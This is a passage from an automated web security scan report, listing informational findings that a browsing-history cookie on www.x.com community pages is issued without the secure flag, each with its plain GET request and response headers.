Set-Cookie: jive.recentHistory.-1=31342c323034303b31342c323133313b31342c323030343b31342c323033393b31342c323131343b31342c323133333b31342c323032353b31342c323033343b31342c323032333b31342c323032343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:10 GMT; Path=/
Vary: User-Agent
JP: D=100595 t=1313157070639699
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.27. https://www.x.com/community/ppx/global/cn

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/cn

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/cn HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323133313b31342c323030343b31342c323033393b31342c323034303b31342c323131343b31342c323133333b31342c323032353b31342c323033343b31342c323032333b31342c323032343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:10 GMT; Path=/
Vary: User-Agent
JP: D=70307 t=1313157070898066
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.28. https://www.x.com/community/ppx/global/de

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/de

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/de HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034323b31342c323133313b31342c323034313b31342c323034303b31342c323030343b31342c323033393b31342c323131343b31342c323133333b31342c323032353b31342c323033343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:12 GMT; Path=/
Vary: User-Agent
JP: D=91052 t=1313157072186357
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.29. https://www.x.com/community/ppx/global/fr

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/fr

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/fr HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:11 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034313b31342c323034303b31342c323033393b31342c323133313b31342c323030343b31342c323131343b31342c323133333b31342c323032353b31342c323033343b31342c323032333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:11 GMT; Path=/
Vary: User-Agent
JP: D=90705 t=1313157071522380
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.30. https://www.x.com/community/ppx/global/it

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/it

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/it HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034333b31342c323133303b31342c323034323b31342c323030343b31342c323034313b31342c323034303b31342c323133313b31342c323033393b31342c323131343b31342c323133333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:13 GMT; Path=/
Vary: User-Agent
JP: D=83031 t=1313157073107237
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.31. https://www.x.com/community/ppx/global/jp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/jp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/jp HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323133303b31342c323034323b31342c323034313b31342c323034333b31342c323030343b31342c323034303b31342c323133313b31342c323033393b31342c323131343b31342c323133333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:13 GMT; Path=/
Vary: User-Agent
JP: D=64298 t=1313157073255195
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.32. https://www.x.com/community/ppx/global/mx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/mx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/mx HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:14 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034343b31342c323133303b31342c323030343b31342c323034323b31342c323034333b31342c323034313b31342c323034303b31342c323133313b31342c323033393b31342c323131343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:14 GMT; Path=/
Vary: User-Agent
JP: D=84686 t=1313157074147841
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.33. https://www.x.com/community/ppx/global/nl

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/nl HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:14 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034353b31342c323034333b31342c323133303b31342c323034343b31342c323030343b31342c323034323b31342c323034313b31342c323034303b31342c323133313b31342c323033393b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:14 GMT; Path=/
Vary: User-Agent
JP: D=74016 t=1313157074525656
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.34. https://www.x.com/community/ppx/global/sp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/sp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/sp HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:15 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034363b31342c323034353b31342c323034343b31342c323034333b31342c323133303b31342c323030343b31342c323034323b31342c323034313b31342c323034303b31342c323133313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:15 GMT; Path=/
Vary: User-Agent
JP: D=120118 t=1313157075242154
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.35. https://www.x.com/community/ppx/global/uk

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/uk

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/uk HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:15 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034373b31342c323034343b31342c323034363b31342c323034353b31342c323034333b31342c323133303b31342c323030343b31342c323034323b31342c323034313b31342c323034303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:15 GMT; Path=/
Vary: User-Agent
JP: D=132311 t=1313157075777765
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.36. https://www.x.com/community/ppx/ipn

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/ipn

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/ipn HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:00 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032383b31342c323032363b31342c323032373b31342c323032303b31342c323031383b31342c323036333b31342c323031373b31342c323030363b31342c323031363b31342c323234363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:01 GMT; Path=/
Vary: User-Agent
JP: D=93490 t=1313157061548233
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.37. https://www.x.com/community/ppx/marketplaces

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/marketplaces

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/marketplaces HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:18 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323134323b31342c323134353b31342c323134333b31342c323030353b31342c323034373b31342c323034363b31342c323034353b31342c323034343b31342c323034333b31342c323133303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:18 GMT; Path=/
Vary: User-Agent
JP: D=108959 t=1313157078551586
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.38. https://www.x.com/community/ppx/mass_pay

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/mass_pay

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/mass_pay HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031313b31342c323030393b31342c323030373b31342c323030333b31342c323031343b31342c323030383b31342c323031303b31342c323031393b31342c323237363b31342c323237303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:34 GMT; Path=/
Vary: User-Agent
JP: D=98932 t=1313157034722623
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.39. https://www.x.com/community/ppx/offlineanddevices

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/offlineanddevices

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/offlineanddevices HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:18 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323134363b31342c323134323b31342c323030353b31342c323134333b31342c323134353b31342c323034373b31342c323034363b31342c323034353b31342c323034343b31342c323034333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:18 GMT; Path=/
Vary: User-Agent
JP: D=113532 t=1313157078857855
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.40. https://www.x.com/community/ppx/p2p

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/p2p

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/p2p HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:18 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323134343b31342c323134323b31342c323134333b31342c323134353b31342c323134363b31342c323030353b31342c323034373b31342c323034363b31342c323034353b31342c323034343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:19 GMT; Path=/
Vary: User-Agent
JP: D=81213 t=1313157079302842
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.41. https://www.x.com/community/ppx/payflow_link

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/payflow_link

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/payflow_link HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031333b31342c323236393b31342c323232313b31342c323235313b31342c323130303b31342c323038343b31342c323036333b31342c323036323b31342c323035323b31342c323035303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:56 GMT; Path=/
Vary: User-Agent
JP: D=81349 t=1313157056540618
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.42. https://www.x.com/community/ppx/payflow_pro

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/payflow_pro

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/payflow_pro HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:32 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031343b31342c323030393b31342c323030383b31342c323031303b31342c323031393b31342c323237363b31342c323237303b31342c323030353b31342c323030373b31342c323030343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:33 GMT; Path=/
Vary: User-Agent
JP: D=271432 t=1313157033322018
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.43. https://www.x.com/community/ppx/payflow_xml_reporting

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/payflow_xml_reporting

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/payflow_xml_reporting HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:00 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032373b31342c323032303b31342c323032363b31342c323031383b31342c323031373b31342c323036333b31342c323030363b31342c323031363b31342c323234363b31342c323031353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:01 GMT; Path=/
Vary: User-Agent
JP: D=106498 t=1313157060903457
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.44. https://www.x.com/community/ppx/pdt

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/pdt

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/pdt HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032393b31342c323033303b31342c323032303b31342c323032373b31342c323032383b31342c323036333b31342c323032363b31342c323031383b31342c323031373b31342c323030363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:02 GMT; Path=/
Vary: User-Agent
JP: D=122974 t=1313157061920177
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.45. https://www.x.com/community/ppx/permissions

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/permissions

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/permissions HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032303b31342c323032363b31342c323031363b31342c323031373b31342c323030363b31342c323031383b31342c323036333b31342c323234363b31342c323031353b31342c323031333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:00 GMT; Path=/
Vary: User-Agent
JP: D=124196 t=1313157059978751
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.46. https://www.x.com/community/ppx/press

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/press

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/press HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:20 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
